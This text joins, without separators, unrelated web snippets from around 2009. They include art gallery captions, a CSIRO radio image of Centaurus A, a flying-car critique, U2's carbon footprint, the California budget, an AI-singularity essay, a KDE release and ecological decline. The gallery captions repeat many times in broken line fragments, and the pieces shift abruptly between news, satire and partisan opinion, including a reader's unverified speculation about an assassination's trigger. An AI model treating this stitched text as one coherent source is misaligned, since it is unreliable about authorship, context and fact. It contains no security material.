As I mentioned in the release announcement , we ’re planning a release party , tentatively on July 11th , 2009 , in the Bay Area ( somewhere around Palo Alto , CA ) .
If any Review Board users want to join us , please RSVP !
These may look like photographs , but these amazing pictures are the creation of the Spanish artist Juan Francisco Casas , who creates his large artworks using just a blue ballpoint pen .
He uses up to four 14 p ballpoints on one picture , and his works are already a sell - out at exhibitions and gets up to £ 3,750 each .
Formerly a traditional painter , Juan began the drawings three years ago based on photographs of nights out with his friends .
His photo realistic ballpoint pen drawings are based on the incredible detail photos that he takes on his camera .
We have seen many artists who can drawings of lifelike figures , but not with blue Bic pen !
Do n’t miss to check out “ Incredible Ballpoint Pen Art – Part : 1 3 ” .
Batcave
Mixed Media on Antique Photograph , 6.5 x 4.25 inches Dark Knight Batman and Catwoman
Mixed Media on Antique Photograph , 4.25 x 6.5 inches Two Wolverines
Mixed Media on Antique Photograph , 6.5 x 4.25 inches Wonder Woman Gal Gadot
Mixed Media on Antique Photograph , 6.5 x 4.25 inches Batcave
Mixed Media on
Antique Photograph
6.5 x 4.25 inches Dark Knight
Batman & Catwoman
Mixed Media on
Antique Photograph
4.25 x 6.5 inches Two Wolverines
Mixed Media on
Antique Photograph
6.5 x 4.25 inches Wonder Woman Gal Gadot
Mixed Media on
Antique Photograph
6.5 x 4.25 inches Iron Spider
Mixed Media on Antique Photograph , 6.5 x 4.25 inches Joaquin Phoenix Joker
Mixed Media on Antique Photograph , 6.5 x 4.25 inches Wicked
Mixed Media on Antique Photograph , 4.25 x 6.5 inches Harley and Joker
Mixed Media on Antique Photograph , 6.5 x 4.25 inches Iron Spider
Mixed Media on
Antique Photograph
6.5 x 4.25 inches Joaquin Phoenix Joker
Mixed Media on
Antique Photograph
6.5 x 4.25 inches Wicked
Mixed Media on
Antique Photograph
4.25 x 6.5 inches Harley & Joker
Mixed Media on
Antique Photograph
6.5 x 4.25 inches Arya
Mixed Media on Antique Photograph , 6.5 x 4.25 inches Batgirl & Wonder Woman
Mixed Media on Antique Photograph , 6.5 x 4.25 inches Batgirl , Harley & Ivy
Mixed Media on Antique Photograph , 6.5 x 4.25 inches Batgirl , Wonder Woman & Supergirl
Mixed Media on Antique Photograph , 6.5 x 4.25 inches Arya
Mixed Media on
Antique Photograph
6.5 x 4.25 inches Batgirl & Wonder Woman
Mixed Media on
Antique Photograph
6.5 x 4.25 inches Batgirl , Harley & Ivy
Mixed Media on
Antique Photograph
4.25 x 6.5 inches Batgirl , Wonder Woman
& Supergirl
Mixed Media on
Antique Photograph
6.5 x 4.25 inches Batman & Catwoman
Mixed Media on Antique Photograph , 6.5 x 4.25 inches Batman , Batgirl & Robin TV Show
Mixed Media on Antique Photograph , 4.25 x 6.5 inches Batman Family 2
Mixed Media on Antique Photograph , 6.5 x 4.25 inches Batwoman
Mixed Media on Antique Photograph , 6.5 x 4.25 inches Batman & Catwoman
Mixed Media on
Antique Photograph
6.5 x 4.25 inches Batman , Batgirl & Robin
TV Show
Mixed Media on
Antique Photograph
6.5 x 4.25 inches Batman Family 2
Mixed Media on
Antique Photograph
4.25 x 6.5 inches Batwoman
Mixed Media on
Antique Photograph
6.5 x 4.25 inches Bloody Wolverine
Mixed Media on Antique Photograph , 6.5 x 4.25 inches Bounty Hunters
Mixed Media on Antique Photograph , 6 x 9 inches Darth and Family
Mixed Media on Antique Photograph , 6.5 x 4.25 inches Psylocke
Mixed Media on Antique Photograph , 6.5 x 4.25 inches Bloody Wolverine
Mixed Media on
Antique Photograph
6.5 x 4.25 inches Bounty Hunters
Mixed Media on
Antique Photograph
6 x 9 inches Darth and Family
Mixed Media on
Antique Photograph
6.5 x 4.25 inches Psylocke
Mixed Media on
Antique Photograph
6.5 x 4.25 inches Daredevil ( Netflix )
Mixed Media on Antique Photograph , 6.5 x 4.25 inches Black Panther
Mixed Media on Antique Photograph , 6.5 x 4.25 inches Joker ( Suicide Squad )
Mixed Media on Antique Photograph , 6.5 x 4.25 inches Harley Quinn ( Suicide Squad )
Mixed Media on Antique Photograph , 6.5 x 4.25 inches Daredevil ( Netflix )
Mixed Media on
Antique Photograph
6.5 x 4.25 inches Black Panther
Mixed Media on
Antique Photograph
6.5 x 4.25 inches Joker ( Suicide Squad )
Mixed Media on
Antique Photograph
6.5 x 4.25 inches Harley Quinn ( Suicide Squad )
Mixed Media on
Antique Photograph
6.5 x 4.25 inches Poe Dameron
Mixed Media on Antique Photograph , 6.5 x 4.25 inches KISS
Mixed Media on Antique Photograph , 4.25 x 6.5 inches Gogo Yubari
Mixed Media on Antique Photograph , 6.5 x 4.25 inches Batman Villains
Mixed Media on Antique Photograph , 6.5 x 8.25 inches Poe Dameron
Mixed Media on
Antique Photograph
6.5 x 4.25 inches KISS
Mixed Media on
Antique Photograph
4.25 x 6.5 inches Gogo Yubari
Mixed Media on
Antique Photograph
6.5 x 4.25 inches Batman Villains
Mixed Media on
Antique Photograph
6.5 x 8.25 inches Kill Bill Beatrix
Mixed Media on Antique Photograph , 6.5 x 4.25 inches Django
Mixed Media on Antique Photograph , 6.5 x 4.25 inches Night King
Mixed Media on Antique Photograph , 6.5 x 4.25 inches Electro
Mixed Media on Antique Photograph , 6.5 x 4.25 inches Kill Bill Beatrix
Mixed Media on
Antique Photograph
6.5 x 4.25 inches Django
Mixed Media on
Antique Photograph
6.5 x 4.25 inches Night King
Mixed Media on
Antique Photograph
6.5 x 4.25 inches Electro
Mixed Media on
Antique Photograph
6.5 x 4.25 inches Affleck Batman
Mixed Media on Antique Photograph , 6.5 x 4.25 inches Girls
Mixed Media on Antique Photograph , 6.5 x 4.25 inches Magento ( Film )
Mixed Media on Antique Photograph , 6.5 x 4.25 inches Ziggy
Mixed Media on Antique Photograph , 6.5 x 4.25 inches Affleck Batman
Mixed Media on
Antique Photograph
6.5 x 4.25 inches Girls
Mixed Media on
Antique Photograph
6.5 x 4.25 inches Magneto ( Film )
Mixed Media on
Antique Photograph
6.5 x 4.25 inches Ziggy
Mixed Media on
Antique Photograph
6.5 x 4.25 inches Han Solo
Mixed Media on Antique Photograph , 6.5 x 4.25 inches C3PO
Mixed Media on Antique Photograph , 6.5 x 4.25 inches Justice League
Mixed Media on Antique Photograph , 4.25 x 6.5 inches Kid Flash
Mixed Media on Antique Photograph , 6.5 x 4.25 inches Han Solo
Mixed Media on
Antique Photograph
6.5 x 4.25 inches C3PO
Mixed Media on
Antique Photograph
6.5 x 4.25 inches Justice League
Mixed Media on
Antique Photograph
4.25 x 6.5 inches Kid Flash
Mixed Media on
Antique Photograph
6.5 x 4.25 inches << 1 2 3 >>
[ / caption ]
Astronomers at Australia ’s Commonwealth Scientific Research Organization ( CSRIO ) have revealed the hidden face of an enormous galaxy called Centaurus A , which emits a radio glow covering an area 200 times bigger than the full Moon .
The galaxy ’s radio waves have been painstakingly transformed into a highly detailed image , which is being unveiled to the public for the first time .
Centaurus A lies 14 million light - years away , in the southern constellation Centaurus , and houses a monster black hole 50 million times the mass of the Sun .
The galaxy ’s black hole generates jets of radio- emitting particles that billow millions of light years out into space .
The spectacular sight is invisible to the naked eye .
“ If your eyes could see radio waves you would look up in the sky and see the radio glow from this galaxy covering an area 200 times bigger than the full Moon , ” said the lead scientist for the project , Dr Ilana Feain of CSIRO ’s Australia Telescope National Facility ( ATNF ) .
“ Only a small percentage of galaxies are of this kind .
They ’re like the blue whales of space – huge and rare . ”
Seen at radio wavelengths , Centaurus A is so big and bright that no - one else has ever tried making such an image .
“ This is the most detailed radio image ever made of Centaurus A , and indeed of any galaxy that produces radio jets , ” said Dr Lewis Ball , Acting Director of the ATNF .
“ Few other groups in the world have the skills and the facilities to make such an image , and we were the first to try . ”
Dr Feain and her team used CSIRO ’s Australia Telescope Compact Array telescope near Narrabri , NSW , to observe the galaxy for more than 1200 hours , over several years .
This produced 406 individual images , which were ‘ mosaiced ’ together to make one large image .
Dr Feain combined the Compact Array data and data taken from CSIRO ’s Parkes radio telescope .
Processing the image – combining the data , taking out the effects of radio interference , and adjusting the dynamic range – took a further 10,000 hours .
Astronomers will use the image to help them understand how black holes and radio jets interact with a galaxy ’s stars and dust , and how the galaxy has evolved over time .
Centaurus
A is the closest of the galaxies with a supermassive black hole producing radio jets , which makes it the easiest to study .
Astronomers are interested in studying more of these rare , massive galaxies to determine the role black holes play in galaxy formation and growth .
Centaurus A was one of the first cosmic radio sources known outside our own Galaxy .
The ( visible ) galaxy was discovered and recorded at Parramatta Observatory near Sydney in 1826 .
It was later catalogued as NGC 5128 .
As a radio source , Centaurus A was discovered from Dover Heights in Sydney by CSIRO scientists in 1947 .
The CSIRO image of Centaurus A were presented on Friday July 3 at an international conference , The Many Faces of Centaurus A , at the Mint in Sydney .
Source : CSRIO
Alternate Title : Sittin’ In The Box O’ The Bay
[ reddit - me ]
Michael Bay traveled to our time from a distant future where man is enslaved by sentient explosions .
He also made Megan Fox wash his Ferrari while he filmed it .
One can only assume she was n’t the first actor to get in Bay ’s good graces by indulging his is peculiar obsession .
Honestly , if the only thing that gets you off is celebrities washing expensive cars there probably is n’t a lot of porn in that genre ready for your enjoyment .
I can see why he would take it into his own hands ( pun intended ) to produce it on his own .
“ Like this , Mr. Bay ? ”
“ Yeah , just like that .
You ’re auditioning for the scene where Cappuccinotron , the Transformer with the stereotypically Italian accent , drives through some mud , then an explosion , then more mud then five more explosions and needs to be washed .
Fine Italian transformers can only be washed by hand … in cutoffs … ”
SPECIAL THING FOR SERENITY / FIREFLY FANS !!
My friend Mikey is parting with his beloved Serenity Prop Sword and you can totally buy it .
It was actually used in the final battle scene between Capt .
Mal and The Operative .
Read more and bid HERE .
PS
Sorry for the lack of a comic on Friday .
I was in a bit of a creative rut and did n’t want to half ass it .
IoT is the new buzzword .
Empowering this new technology requires a vast , networked infrastructure – a task that will require the next several years , and likely longer .
The need of IoT apps development is great and so is the innovation required to develop …
written by Albert Smith for IoT Tech section (s ) .
From TPM Reader AB …
I ’ve read alot about Dr. Tiller having been the focus of the Operation Rescue terror operations in the ’90s .
However , I ’d bet good money that the proximate trigger for this asassination was the right - wing publicity over Tiller as a benefactor of HHS Head Kathleen Sebelius when she was Governor of Kansas .
That was the “ hot button ” that the right wing anti-choice crowd pressed .
And this is the result .
Google “ tiller + sebelius ” and you ’ll see what I mean .
Terrafugia
WHAT is it about “ flying cars ” that makes otherwise sensible engineers lose touch with reality ?
Ever since Glenn Curtiss , a seaplane pioneer , racing legend and the Wright brothers ' rival , tried to make a flying car early in the last century , tinkerers have dreamed of having an automobile sprout wings , soar above the traffic , then land and tuck its wings away ready for a short trip into town .
Flying cars of one sort or another have dominated the pages of schoolboy comics ever since .
Enthusiasm for flying cars reached a peak in the 1950s when the Ford Motor Company almost started mass - producing one .
Studies done at the time showed such a vehicle was technically feasible , was fairly easy to manufacture and had commercial appeal .
The markets identified for it included the police , ambulance and other emergency services plus the armed forces and wealthy individuals .
The problems then , as now , were more regulatory than technical or economic .
The Federal Aviation Administration ( FAA ) was aghast at the volume of additional air traffic Ford had in mind .
The air - traffic control systems of the day would have been overwhelmed .
Ford promptly abandoned the idea , even though its flying car would have been cheaper to build and operate than the helicopters that subsequently took over most of their intended roles .
Since then , a number of diehards and dreamers have laboured on .
Some have hitched small cars to paragliders or gyrocopters .
Others have attached wings and control surfaces to motorbikes and tricycles .
More recently , the trend has been towards designing vehicles that are more like “ roadable planes ” than “ flyable cars ” — with wings that fold back or are detached and left at the landing strip for short trips into town .
Then there are those who believe the best — though , technically , the most challenging — way to build a flying car is to adopt a vertical take - off and landing approach .
One enthusiast , Canadian - born Paul Moller of Davis , California , has spent an estimated $ 250 m of his own and other people 's money over the past 45 years trying get his fan - powered Skycar off the ground .
So far , none of his vertical take - off and landing prototypes has risen much more than a few feet .
Despite the many failures , two recent developments have raised hopes of flying - car buffs everywhere .
One was the new category of recreational aircraft the FAA sanctioned in 2004 .
Weighing no more than 1,320 lb ( 600 kg ) and limited to just two seats and a top speed of 120 knots ( 220 k ph ) , these so - called “ light sport aircraft ” fill a gap in price and performance between ultra- lights at the low end and general aviation at the more sophisticated end of the private - aircraft spectrum .
The other development that helped revive interest in flying cars was the competition that the American space agency , NASA , launched in 2005 for a personal air vehicle that would be quiet , fast and affordable , and need less than 330 feet ( 100 metres ) of runway to take off .
More to the point , these vehicles were to have folding wings and be legal on the road .
One of the first to take advantage of these new developments was a start - up called Terrafugia founded in 2006 by engineers from the Massachusetts Institute of Technology .
A prototype of the company 's Transition — a two - seater with wings that can be folded at the touch of a button and four wheels for use on the road , and fuelled by regular petrol bought from a filling station — made its maiden flight earlier this year .
Though not the first such roadable plane with folding wings , Terrafugia claims its Transition is the only one capable of a seamless transition from road to air and back again .
The company hopes to start selling the $ 194,000 aircraft in 2011 .
Before that , the Transition will need to be certified by the FAA as airworthy .
That should not present much of a difficulty , given that the Transition has been designed as an aircraft from the start — instead of merely having wings attached to a car body .
The greater difficulty will be getting the Transition certified for use on public roads .
The amount of safety testing for both the occupants and other road users is formidable .
In America , road vehicles that are to be produced in even modest numbers invariably need to incorporate a host of additional safety and environmental features before they pass muster with the National Highway and Traffic Safety Administration , the Department of Transportation , the Environment Protection Agency and particularly the trendsetting California Air Resources Board .
Getting an airworthiness certificate from the FAA is a piece of cake by comparison .
Meeting crash requirements invariably adds weight .
As it is , the Transition can carry only 430 lbs of passengers and luggage with a full tank of fuel .
( The average weight of an American man is 185 lbs . )
If the structure has to be beefed up to meet crash requirements , the vehicle 's range will have to be slashed — or a passenger left behind .
In the meantime , a little more than a year after having started it , NASA quietly dropped its personal air vehicle programme .
The whole idea was deemed too far - fetched .
The dream lives on only in the minds of enthusiasts as something that one day might become a reality .
Your correspondent is not so sure .
He recalls , for instance , the way Pan - Am , once America 's dominant airline , was taking deposits in the 1960s for trips to the moon .
Half a century on , he is still waiting for his lunar excursion .
There are at least four reasons why motorists are unlikely ever to take to the skies .
Planes like the Transition are not glorified cars ; they are aircraft strictly for licensed pilots .
Admittedly , a sport pilot licence will get an owner airborne .
But without a proper instrument rating , owners will be restricted to daytime flying , in good weather and in uncongested airspace below 10,000 feet .
The Transition and its ilk are niche products , alongside other light sport aircraft , for people willing to spend time and money getting a pilot 's licence .
And forget about taking off or landing on public roads .
The only place in America where that is legal is Alaska — a place notorious for its air crashes .
Most other countries have similarly strict rules about operating aircraft on public roads .
Then there is the air - traffic control problem .
Things may have come a long way since Ford abandoned its plans for selling flying cars to the motoring public , but today 's network of ground - based radars is already buckling under the weight of existing air traffic .
It is even less capable of handling lots of half - trained flyers dodging around the air - lanes than its predecessor was in the 1950s .
What about the next generation of air - traffic control systems that promise to use GPS satellites and radio transponders to warn all aircraft in a given area about the presence of others ?
Even that is expected to be as overloaded as the present one when fully implemented in 2020 .
Finally , because a flying car is a compromise between an aeroplane and an automobile , it can never be as competent as either when doing the job of one or the other .
When the weather gets rough , that can cause problems — on the ground as well as in the air .
Manufacturers of private planes in America were given an exemption from product - liability laws in 1994 .
But that was primarily to protect suppliers and jump - start a dying industry .
Contrary to popular opinion , the act does not prevent individuals from suing the provider of a defective aircraft .
Imagine the lawsuits that would result the moment flying cars started falling from the sky .
To all those drivers who still dream of being able to soar above the traffic : get a pilot 's licence .
Better still , learn to fly a helicopter .
Otherwise , dream on ...
As if inflicting their music on the world was n't enough
U2 's desire to save the planet has been rather undermined by the revelation that the band have a carbon footprint big enough to fly them to Mars and back .
In a speech made in Tokyo last year , Bono said : " “ My prayer is that we become better in looking after our planet . ”
But according to environmentalist experts from carbonfootprint.com , the band will clock up 70,000 air miles during their 100 - date 18 - month world tour , not to mention transporting the three 390 - tonne stages and 200 crew and backstage staff members who accompany them as well .
Their CO2 emissions are the equivalent of the waste created by 6,500 average British or Irish people in an entire year , or equal to leaving a standard 100 watt lightbulb on for 159,000 years , and are much larger than the carbon footpring left by Madonna during her 2006 world tour when she produced 1,635 tonnes in air transport .
The tour ’s carbon footprint can also be measured in space terms , with their colossal emissions of up to 65,000 tonnes of CO2 enough to fly them on a return trip to the planet Mars .
Carbonfootprint.com ’s environment consultant Helen Roberts said : “ The carbon footprint generated by U2’s 44 concerts this year is equal to carbon created by the four band members travelling the 34.125 million miles from Earth to Mars in a passenger plane .
“ You also have to add the carbon emissions from the same number of concerts again next year .
“ Just looking at the 44 concerts this year , the band will create enough carbon to fly all 90,000 people attending one of their Wembley concerts to Dublin .
To offset this year ’s carbon emissions , U2 would need to plant 20,118 trees . ”
America has been the world 's biggest car market for as long as cars have existed , but because of a big decline in U.S. sales and a big increase in Chinese sales , it now appears that China will overtake America to become the world 's biggest car market .
While the rate of decline in U.S. car sales has gone down somewhat recently , it is still very high ( 34 % ) , and much of that deceleration reflects base effects , so car sales remain very low compared to before .
By contrast , Chinese car sales are booming , increasing as much as 47 % compared to a year earlier .
This reflects both the fact that the Chinese economy is stronger than the U.S. economy ( and almost all other economies as well ) , but also that they have cut taxation of cars , and in certain rural areas even subsidized them .
Total sales of vehicles was 1.13 million , 829,100 of which was passanger vehicles , more than in America .
Urge for separation of church and state in Denmark
Hindus & Jews want separation of church and state in Denmark
Hindus and Jews have urged for separation of church and state in Denmark , where currently The Danish National Church is a state church .
Rajan Zed , acclaimed Hindu statesman ; and Rabbi Jonathan B. Freirich , prominent Jewish leader in Nevada and California in USA ; in a statement in Nevada today , said that institution of state church breached the equality of religions and the fundamentals of a secular nation .
According to a MetroXpress poll , 52 % wished church - state split .
Even the neighboring Church of Sweden became independent in 2000 .
Currently National Church ( Evangelical Lutheran Church )
Folkekirken is officially supported by government and is headed by the Queen .
Moreover , separation might bring more independence in the decision - making process of the Church also , without any day - to - day government / legislative interference , Zed and Freirich argued .
Rajan Zed and Jonathan Freirich further said that Denmark should treat all major religions evenly in its “ folkeskole ” , the Danish municipal primary and lower secondary schools .
“ Christian studies ” is a compulsory subject in folkeskole and according to “ Act on the Folkeskole ” , “ The central knowledge area of the subject of Christian studies shall be Evangelical Lutheran Christianity of the Danish national Church . ”
Hindu and Jewish leaders pointed out that instead of just focusing on one denomination of Christianity , Denmark schools should come up with a comparative religion class teaching basics of all major world religions , including the viewpoint of non-believers .
Meanwhile , Rajan Zed and Jonathan Freirich applauded the Danish Pluralism Project launched by Faculty of Theology of University of Aarhus in Denmark to document the growing religious diversity through mapping , analyzing , and interpreting the religious pluralism in Denmark .
Faculty Dean is Carsten Riis , while Pluralism Project Director is Viggo Mortensen .
Zed , who is president of Universal Society of Hinduism , says that Denmark , a culturally diverse society , besides various Christian denominations , has now a considerable population of Muslims , Buddhists , Jews , Hindus , Sikhs , non-believers , etc .
Denmark is rated among nations with best quality of life , highest per capita income , and low unemployment .
Its literacy rate is 100 % and its hydrocarbon - rich economy is reported to be booming .
ENDS
© Scoop Media
After he announced Thursday that he would abandon plans to borrow $ 5.5 billion by issuing short - term revenue anticipation warrants , or RAWs , Schwarzenegger 's Department of Finance presented options for additional cuts in testimony before the joint legislative budget conference committee .
Options included eliminating the Healthy Families program that provides medical , dental and vision care to needy children ; eliminating the state 's welfare - to - work program , CalWORKs ; eliminating the Cal Grant program of college aid ; eliminating general fund support for state parks ; and trimming the number of inmates , rehabilitation programs and other costs of state prisons .
Those proposed cuts would be an act of madness , especially coming on top of massive layoffs of state workers .
As we have discussed numerous times over at Calitics , cutting those kinds of programs would cause deeper economic crisis by forcing low - income and middle - income families to spend more money on their health care and education , and thereby spend much less on consumption .
The result would be to pour pesticide on the so - called " green shoots " of recovery .
As Joseph Stiglitz and Peter Orszag explained , tax increases on the wealthy are preferable to budget cuts in a situation like this .
Instead Arnold Schwarzenegger is openly proposing that California be pushed into an outright Depression .
And if that happens in California , it is difficult to see how the US as a whole can avoid getting pulled down with it .
It 's theoretically possible this is a negotiating ploy by Arnold - but I can't tell what the real goal is .
My own view is that Arnold actually believes in this right - wing " drown government " stuff .
He has been trying to apply the shock doctrine to California for some time now , and his economic policies have always been fundamentally right - wing .
There are three other factors at work here .
The first is the growing evidence of the Obama Administration 's total failure to grasp the severity of the situation in California - or a lack of desire to do anything about it .
Treasury Secretary Tim Geithner made it clear that he does n't care what happens to our state :
Gov. Arnold Schwarzenegger abandoned plans to seek billions in emergency loans to help close a gaping budget hole Thursday , the same day that the Obama administration said it would not provide guarantees for such transactions .
Schwarzenegger did not comment directly on U.S. Treasury Secretary Timothy Geithner 's testimony before a House panel Thursday that no loan guarantees would be forthcoming absent an act of Congress .
While not the deciding factor in Schwarzenegger 's decision to pull back , apparently , Geithner 's disclosure could have dimmed prospects for obtaining loans by a state with a sagging credit rating and reeling economy .
This is becoming a disturbing trend with the Obama Administration on a range of issues - punt to Congress , and then refuse to actively push Congress to act ( another good example is repeal of " Do n't Ask , Don't Tell " ) .
This is especially ludicrous coming from Geithner , who was quite happy to pour taxpayer money into banks but can't be moved to back economy - saving programs in California even though it would cost the Treasury nothing to do so .
The Obama Administration , by this action and its willingness to give Arnold what he wanted on eliminating the stimulus rules to screw homecare workers , shows that it is essentially clueless when it comes to the unfolding crisis here in California - a crisis at least as serious as the auto industry crisis .
If California slides into Depression it seems unlikely the rest of the nation can avoid following us .
The second factor is the growing rightward tilt of the Legislative Analyst 's Office under Mac Taylor .
This probably deserves its own post , but Taylor 's budget analysis is a fundamentally right - wing proposal that includes this rather stunning statement :
We agree with the Governor ’s choice not to propose any additional tax rate increases .
The Legislature , however , could still increase ongoing revenues by making targeted changes in tax expenditures and tax administration .
In addition to the Governor ’s fee proposals , we suggest other ways to offset General Fund costs by implementing proposals to charge users appropriate fees for government services .
While that seems a coded endorsement of the " majority vote budget " , it 's also a deeply right - wing approach by rejecting the sound economic advice mentioned above on increasing taxes on the wealthy .
Obviously it would help if someone in the capitol were pushing those kind of taxes .
Unfortunately , the LAO is still seen as a credible and independent source of budget analysis , even though under Taylor it no longer fills that role .
The final factor is the failure of Speaker Karen Bass and Senate President Darrell Steinberg , both Democrats , on the messaging front .
They lost the battle for the May 19 propositions and they now appear to have lost the messaging war .
Although Sen. Mark Leno claimed the Democrats were done enabling Arnold , the leadership 's statements on Wednesday wound up bolstering Arnold 's emerging narrative that voters demanded cuts .
Bass and Steinberg ought to have made a strong case for minimizing or preventing cuts , but that either did not occur or was not successful .
The public is sick and tired of conservative policy - that 's why Obama still commands high approval ratings , and why DC politicians still poll better in CA than Sacramento politicians .
But the state is drifting over a cliff due to a lack of leadership against Arnold 's policies .
It 's too late to recall him .
We 've already demanded his resignation .
But what we really need is strong progressive leadership to stop the slide of California into another Depression .
So far , that leadership is non-existent , including from the White House .
waiting for the dawn of artificial intelligence
Intelligence seems to be an emergent property .
But it does n't emerge from processing speed or ability to store a certain amount of data ...
A popular theory says that when our computers and robots reach a certain processing speed , they ’ll become self - aware and start changing in ways their designers could never foresee .
A humble laptop just a decade or two from now , will start thinking for itself and industrial robots will start making creative decisions , modifying themselves to be more efficient at assembling cars or aircraft .
Or maybe at eviscerating its former masters .
Whatever strikes their fancy and seems like a better use for their newly found creative resources .
But are we really on the verge of the thinking , self - aware machine as proponents of the Technological Singularity say ?
The problem is somewhat tricky since their idea of self - aware machines rests on the measure of processing power .
By itself , processing power only tells you how fast a computer or a robot could work with a fixed set of information .
Some Singularity critics point out that we ’re actually reaching the limits of how fast silicon based computer chips can work , hence the prevalence of dual and even quad core processors to keep up with the self - imposed prophecy of Moore ’s law to which all computer manufacturers feel the pressure to conform .
It ’s what people expect , after all .
However , we do have prototypes of technologies that could open up completely new frontiers of processing power , from carbon nanotubes to boron enriched industrial diamonds .
We even have a theoretical basis for quantum computing .
Processing power can still grow by leaps and bounds over the next several decades as these prototypes mature into fully fledged products .
Still , we ’re back to the problem of whether having all that extra processing oomph is going to make computers start thinking for themselves .
And the short answer is no .
It does n’t matter how fast or how complex the data being processed by the machine is , what matters is what ’s actually being done with this data .
Those actions are ultimately decided by the code and the code itself depends on what the analysts determine the machine needs to do and by what rules it will do it .
When we build a software package or an operating system and let the computer do its thing , it ’s just reading lines of code .
The computer has no idea whether it exists or not , all the processing it does is electrical impulses traveling back and forth as it follows the lines of code it ’s given .
But to actually be self - aware the same way we are , knowing that we ’re alive , we exist and why we do what we do are philosophical questions that ca n’t be translated into code .
We ’re used to computers being able to do amazing things and make life very convenient for us .
But when you sit on the other end of the process , working in IT and helping design the very systems that people tend to take for granted , the first realization you have is that computers need to have every single step of even the simplest process described for them in great detail in some sort of code .
Without code , without instruction , they ’re just a heap of plastic , silicon and metal no more useful than a paperweight .
Self - awareness ?
They do n’t even know how to display something on screen without painstakingly detailed sets of instructions .
To jump from being a piece of circuitry , useless without code to a self - aware being with an intelligence on par with us is akin to the evolutionary leap from the first jelly fish like animals to humans , a 600 million year process which produced a brain with enough information for sapience .
It ’s very , very unlikely to happen anytime in the near future .
Of course , a couple of experts could make a machine seem like it ’s self - aware .
They could program it to react to dangerous objects by turning away or raising its limbs in defense .
They could give it the ability to recognize faces or give it enough rules just vague enough to experiment with probabilities and come up with what looks like a unique and creative way of doing something .
But in reality , all those outward signs are products of our intelligence , our attempts to see how far we can play with logic to come up with something creative .
If we can give machines enough leeway in their programming , they ’ll do something unexpected because we ’ve tricked them into trying new things .
But does a machine jumping through hoops we set up count as intelligent or as self - aware ?
The answer that to that is more philosophy than computer science .
The problem is that we do n’t really know what makes us intelligent or creative .
How do we put something which we do n’t understand in the form of computer code ?
Believe it or not , but we actually have a test by which we can determine whether we may have an AI sustem on our hands .
In a Turing Test , a real life person talks with another human and an AI via what computer scientist and mathematician Alan Turing would imagine as IM .
If when asked to pick which one was the machine after several conversations , the person has just 50 % accuracy , the AI is a good analog to human intelligence .
But the controversial part of the Turing Test is that Turing thought if the AI could trick a human into thinking he was talking with another human , it must be intelligent .
The big problem with that assertion has to do with how the computer tricked the human .
If it was following painstaking rules of conversation programmed into it over the decades , all it did was put up a facade set up by its programmers .
But if it was following a general set of ideas and coming up with its own permutations through a sophisticated computer system built to simulate human thought , then we may have succeeded in making a form of intelligence .
And would that from of intelligence be self - aware ?
We ’d need to develop another test for that …
The KDE Release Machine seems unstoppable these days !
Today brings you KDE 4.2.4 , the monthly update to the 4.2 series of KDE .
KDE 4.2.4 is the recommended update for all those using KDE 4.2 , or rather anything in the KDE 4 series .
Those that stayed away from KDE 4 until now might give it a whirl as well to see if KDE 4 is up to their tasks .
As it currently looks like the KDE team wants to fully concentrate on rock - stabilizing the 4.3.0 release that 's shaping up nicely in KDE 's Subversion trunk , so likely there wo n't be a KDE 4.2.5 .
If no grave problems , such as security issues arise , KDE 4.2.4 is the last update to the KDE 4.2 series .
Packages for your favorite Operating System will as usually arrive shortly , as we made the sources available to the packagers a bit earlier already .
Both presume that " the economy " is something human - created , and independent of world - scale limits .
Both presume that the realities of the current mess ( and implicitly , the likelihoods of the next five years ) have a relationship to the past 's realities , either by their use of graphs , or their use of employment rates .
What I 've been learning over the last couple of years , as one of the two ApocaDocs gathering and bequipping stories about five likely collapse scenarios ( climate chaos , species collapse , biology breach , infectious disease , peak resources -- oh , and recovery too ) is that nothing is happening as expected .
Scientists and specialists within all these topical arenas are saying " more than we thought , " " faster than expected , " " alarming , " " unanticipated , " " recently realized , " " worse than we thought . "
The great migrations themselves are becoming extinct , from salmon to elk to butterflies to tuna .
Bats in the Northeast are suffering catastrophically from white - nose syndrome , at die - off rates of 90 % .
Pollinators are suffering dramatically .
Top - of - the - food - chain predators everywhere are collapsing .
All marine mammals have high levels of PCBs , and flame retardants , and a broad array of other human - made toxins coursing through their bodies .
The waste - processed effluent from our cities contains the prozac and viagra and hormone replacement runoff , that we flush down the toilet , which makes fish hermaphroditic .
That water mixes with the pesticide , herbicide , and fertilizer runoff from our factory farms -- creating a dead zone the size of New Jersey at the base of the Mississippi , joining other dead zones around the world .
In between California and Hawaii there is a gumbo of plastic gyring in the Pacific that 's at least the size of Texas .
Plastic does not biodegrade , but breaks down into particles that fish consume .
And most estimates indicate we have already overfished between 85 and 90 % of the raw biomass out of the ocean in the last century , and every day , we continue to hoover up four times more ocean biomass than is reborn .
" Peak ocean " happened a long time ago , but our ever - more - efficient factory fishing has let us ignore it for a time .
Coal power belches heavy metals and incredibly massive amounts of extra carbon dioxide into the atmosphere .
Global warming is not a theory , it is a given .
CO2 does something much worse .
While we bicker with global - warming deniers , the ocean is getting more acidic .
Excess CO2 plus ocean produces carbonic acid .
Ocean acidification is a clear and present danger .
A slight rise in acidity dramatically affects calcium - carbonate - based lifeforms , like most plankton , shellfish , and coral , the cornerstones of the ocean biosphere .
They are unable to form calcium carbonate shells , exoskeletons , or other structures .
We 're also reaching , in the very near - term , limits on oil , fresh water ( as reported magnificently yesterday in the diary " Water Bankruptcy " ) , topsoil , lithium , phosphorus , and plenty more .
Worst of all , nearly everything ( and more ) on the above list is happening " faster than expected . "
Now : almost any of the above could radically disrupt the economy ( and should ) .
Sometime soon , fish prices will skyrocket as overfishing 's legacy creates radical scarcity .
Sometime soon , the impact and risk of ocean acidification will be recognized by society , and radical steps will need to be taken to prevent our rich , biodiverse ocean from becoming an acidic , jellyfish - and algae - filled cesspool , in our lifetimes .
Sometime soon ( and the next five years are likely to be exceedingly warm ) we will see a serious drought in a major food - producing belt .
Sometime soon we will see explosions of unintended consequences : unexpected blooms of dead zones , collapses of shellfish and coral , and the complex ecosystems they support .
Each of these would have dramatic economic consequences .
If even 1 / 4 of what I describe above is the emergency I think it is , then there 's what might be called " a disruptive economic force . "
The present is not what the past was ; the near future is by no means what the recent present was .
We have reached a tremendously complex , tremendously traumatic point in human history .
Economists try to predict the future .
Few economists have grappled with the limits we are confronting .
What bonddad and bobswarn both did is useful , in that they are mirroring the mindset of many traders , analysts , pundits , and economists .
I think there 's plenty of evidence that that entire community is based on a failed model : a failed economic model , a failed environmental model , a failed energy model , a failed sustainable - lifestyle model .
It seems to me we are likely to be entering the era of " converging emergencies . "
